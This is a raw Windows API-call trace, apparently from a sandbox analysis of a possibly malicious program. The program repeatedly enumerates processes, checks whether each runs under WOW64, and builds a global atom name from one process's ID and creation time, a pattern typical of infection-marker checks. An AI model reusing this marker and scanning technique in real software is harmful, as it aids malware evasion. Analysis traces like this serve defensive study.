	[0088.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0088.495] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.495] CloseHandle (hObject=0x20c) returned 1
	[0088.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0088.495] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.495] CloseHandle (hObject=0x20c) returned 1
	[0088.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0088.495] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.495] CloseHandle (hObject=0x20c) returned 1
	[0088.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0088.495] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.495] CloseHandle (hObject=0x20c) returned 1
	[0088.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0088.496] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.496] CloseHandle (hObject=0x20c) returned 1
	[0088.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0088.496] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.496] CloseHandle (hObject=0x20c) returned 1
	[0088.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0088.496] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.496] CloseHandle (hObject=0x20c) returned 1
	[0088.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0088.496] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.496] CloseHandle (hObject=0x20c) returned 1
	[0088.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0088.496] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.496] CloseHandle (hObject=0x20c) returned 1
	[0088.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0088.496] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.496] CloseHandle (hObject=0x20c) returned 1
	[0088.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0088.497] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.497] CloseHandle (hObject=0x20c) returned 1
	[0088.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0088.497] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.497] CloseHandle (hObject=0x20c) returned 1
	[0088.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0088.497] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.497] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0088.497] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0088.498] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0088.498] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.498] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0088.498] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.498] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0088.498] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0088.498] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0088.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0088.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0088.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0088.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0088.499] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.499] CloseHandle (hObject=0x20c) returned 1
	[0088.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0088.499] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.499] CloseHandle (hObject=0x20c) returned 1
	[0088.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0088.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0088.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0088.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0088.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0088.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0088.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0088.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0088.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0088.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0088.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0088.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0088.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0088.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0088.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0088.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0088.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0088.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0088.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0088.538] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.538] CloseHandle (hObject=0x20c) returned 1
	[0088.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0088.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0088.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0088.538] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.538] CloseHandle (hObject=0x20c) returned 1
	[0088.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0088.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0088.538] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.538] CloseHandle (hObject=0x20c) returned 1
	[0088.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0088.539] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.539] CloseHandle (hObject=0x20c) returned 1
	[0088.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0088.539] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.539] CloseHandle (hObject=0x20c) returned 1
	[0088.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0088.539] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.539] CloseHandle (hObject=0x20c) returned 1
	[0088.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0088.539] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.539] CloseHandle (hObject=0x20c) returned 1
	[0088.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0088.539] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.539] CloseHandle (hObject=0x20c) returned 1
	[0088.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0088.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0088.539] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.539] CloseHandle (hObject=0x20c) returned 1
	[0088.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0088.540] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.540] CloseHandle (hObject=0x20c) returned 1
	[0088.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0088.540] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.540] CloseHandle (hObject=0x20c) returned 1
	[0088.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0088.540] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.540] CloseHandle (hObject=0x20c) returned 1
	[0088.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0088.540] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.540] CloseHandle (hObject=0x20c) returned 1
	[0088.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0088.540] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.540] CloseHandle (hObject=0x20c) returned 1
	[0088.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0088.541] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.541] CloseHandle (hObject=0x20c) returned 1
	[0088.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0088.541] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.541] CloseHandle (hObject=0x20c) returned 1
	[0088.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0088.541] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.541] CloseHandle (hObject=0x20c) returned 1
	[0088.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0088.541] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.541] CloseHandle (hObject=0x20c) returned 1
	[0088.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0088.541] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.541] CloseHandle (hObject=0x20c) returned 1
	[0088.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0088.542] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.542] CloseHandle (hObject=0x20c) returned 1
	[0088.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0088.542] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.542] CloseHandle (hObject=0x20c) returned 1
	[0088.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0088.542] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.542] CloseHandle (hObject=0x20c) returned 1
	[0088.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0088.542] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.542] CloseHandle (hObject=0x20c) returned 1
	[0088.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0088.542] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.542] CloseHandle (hObject=0x20c) returned 1
	[0088.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0088.543] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.543] CloseHandle (hObject=0x20c) returned 1
	[0088.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0088.543] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.543] CloseHandle (hObject=0x20c) returned 1
	[0088.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0088.543] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.543] CloseHandle (hObject=0x20c) returned 1
	[0088.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0088.543] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.543] CloseHandle (hObject=0x20c) returned 1
	[0088.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0088.543] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.543] CloseHandle (hObject=0x20c) returned 1
	[0088.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0088.543] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.544] CloseHandle (hObject=0x20c) returned 1
	[0088.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0088.544] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.544] CloseHandle (hObject=0x20c) returned 1
	[0088.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0088.544] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.544] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0088.544] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0088.544] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0088.545] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.545] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0088.545] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.545] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0088.545] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0088.545] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0088.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0088.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0088.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0088.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0088.546] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.546] CloseHandle (hObject=0x20c) returned 1
	[0088.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0088.546] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.546] CloseHandle (hObject=0x20c) returned 1
	[0088.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0088.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0088.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0088.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0088.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0088.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0088.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0088.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0088.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0088.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0088.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0088.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0088.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0088.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0088.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0088.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0088.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0088.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0088.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0088.595] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.595] CloseHandle (hObject=0x20c) returned 1
	[0088.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0088.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0088.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0088.595] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.595] CloseHandle (hObject=0x20c) returned 1
	[0088.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0088.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0088.596] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.596] CloseHandle (hObject=0x20c) returned 1
	[0088.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0088.596] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.596] CloseHandle (hObject=0x20c) returned 1
	[0088.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0088.596] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.596] CloseHandle (hObject=0x20c) returned 1
	[0088.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0088.596] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.596] CloseHandle (hObject=0x20c) returned 1
	[0088.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0088.597] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.597] CloseHandle (hObject=0x20c) returned 1
	[0088.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0088.597] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.597] CloseHandle (hObject=0x20c) returned 1
	[0088.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0088.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0088.597] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.597] CloseHandle (hObject=0x20c) returned 1
	[0088.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0088.597] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.597] CloseHandle (hObject=0x20c) returned 1
	[0088.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0088.597] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.597] CloseHandle (hObject=0x20c) returned 1
	[0088.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0088.598] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.598] CloseHandle (hObject=0x20c) returned 1
	[0088.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0088.598] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.598] CloseHandle (hObject=0x20c) returned 1
	[0088.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0088.598] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.598] CloseHandle (hObject=0x20c) returned 1
	[0088.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0088.598] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.598] CloseHandle (hObject=0x20c) returned 1
	[0088.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0088.598] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.598] CloseHandle (hObject=0x20c) returned 1
	[0088.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0088.598] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.599] CloseHandle (hObject=0x20c) returned 1
	[0088.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0088.599] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.599] CloseHandle (hObject=0x20c) returned 1
	[0088.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0088.599] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.599] CloseHandle (hObject=0x20c) returned 1
	[0088.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0088.599] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.599] CloseHandle (hObject=0x20c) returned 1
	[0088.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0088.599] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.599] CloseHandle (hObject=0x20c) returned 1
	[0088.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0088.599] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.599] CloseHandle (hObject=0x20c) returned 1
	[0088.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0088.600] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.600] CloseHandle (hObject=0x20c) returned 1
	[0088.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0088.600] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.600] CloseHandle (hObject=0x20c) returned 1
	[0088.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0088.600] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.600] CloseHandle (hObject=0x20c) returned 1
	[0088.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
